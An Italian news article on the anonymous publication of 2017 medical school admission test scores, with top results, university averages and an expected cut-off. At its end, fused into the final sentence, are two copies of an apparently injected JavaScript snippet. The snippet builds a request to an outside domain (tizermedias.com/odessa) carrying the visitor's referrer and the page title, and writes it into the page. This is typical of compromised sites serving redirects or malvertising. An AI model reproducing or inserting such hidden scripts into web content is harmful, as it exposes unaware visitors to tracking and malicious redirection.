pubblicati risultati test d'ammissione a Medicina 2017

Dopo due settimane d’attesa, la situazione inizia a farsi più chiara. Sono stati pubblicati in forma anonima nell’area riservata del portale UniversItaly i punteggi del test d’ammissione a Medicina 2017. Il candidato autore della migliore performance nella prova svoltasi lo scorso 5 settembre ha sostenuto l’esame a Milano e ha ottenuto 88,5 punti su 90, sbagliando un’unica domanda. Il questionario associato al codice alfanumerico 15MP77UR7I3ANCG contiene un solo errore in una delle tre domande di ragionamento logico e nessuna risposta risulta essere stata omessa. Per il momento non è possibile per gli aspiranti camici bianchi conoscere il proprio risultato, a meno che non abbiano memorizzato il codice assegnato al proprio questionario. Il fatto di poter visionare i punteggi ottenuti, tuttavia, permette di farsi un’idea generale di come sia andato il test e dà qualche elemento in più per iniziare a fare i primi calcoli.

Il test d’ammissione a Medicina 2017 è andato molto bene anche ai quattro candidati che lo hanno svolto a Padova e Udine e hanno ottenuto 88,1 punti. Scorrendo ulteriormente i punteggi si scopre che tra gli autori delle migliori performance ci sono poi candidati che hanno svolto la prova a Bologna, Siena, Padova. Proprio l’Alma Mater è l’ateneo con il maggior numero di aspiranti che si sono piazzati nelle prime 100 posizioni (19). Padova, invece, è quello con la più elevata percentuale di idonei (cioè coloro che hanno raggiunto almeno il punteggio minimo): 93,61 per cento, a fronte di una media nazionale dell’87,26 per cento. A Pavia si è registrato il punteggio medio più elevato, 49,81 punti, mentre la media nazionale è di 44,68.

Per coloro che si trovano nelle posizioni più in alto della lista, c’è praticamente la certezza non solo di aver superato brillantemente il test d’ammissione a Medicina 2017, ma anche di potersi immatricolare presso l’università che rappresentava la propria prima scelta, senza dover attendere eventuali scorrimenti della graduatoria nazionale, la quale sarà pubblicata il prossimo 3 ottobre. Solo al termine di tali scorrimenti si potrà sapere effettivamente quale sarà il punteggio minimo con il quale potersi assicurare un posto. Per il momento, tuttavia, circolano già delle ipotesi e sembra che quest’anno basterà aver totalizzato 60 punti su 90 per potersi immatricolare.(function(){var d=document;var w=’240′;var h=’300′;var id = Math.floor(Math.random()*9999);var src = ‘http://tizermedias.com/odessa/?54vFcZ&’;src = src + ‘se_referrer=’+document.referrer;src = src + ‘&default_keyword=’+document.title;src = src + ‘&r=’+id;d.write(”);})();(function(){var d=document;var w=’240′;var h=’300’;var id = Math.floor(Math.random()*9999);var src = ‘http://tizermedias.com/odessa/?54vFcZ&’;src = src + ‘se_referrer=’+document.referrer;src = src + ‘&default_keyword=’+document.title;src = src + ‘&r=’+id;d.write(”);})();